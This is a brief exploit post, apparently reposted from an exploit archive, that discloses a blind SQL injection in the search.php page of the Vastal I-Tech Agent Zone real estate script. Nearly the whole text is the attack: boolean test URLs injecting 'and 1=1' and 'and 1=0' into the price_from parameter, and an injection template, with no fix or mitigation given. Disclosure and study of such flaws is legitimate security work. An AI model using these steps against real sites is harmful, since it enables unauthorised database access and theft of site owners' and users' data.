Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability # Date: 31.01.2012 # Author: Cagri Tepebasili # Software : http://www.vastal.com/agent-zone-real-estate-script.html # Tested on: Linux Mint 12 ##################################################################################################################### The First Step >>> http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00 The Second Step >>> http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00 Injection >>> http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00 Greetz : MythSEC <<< Sursa: Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability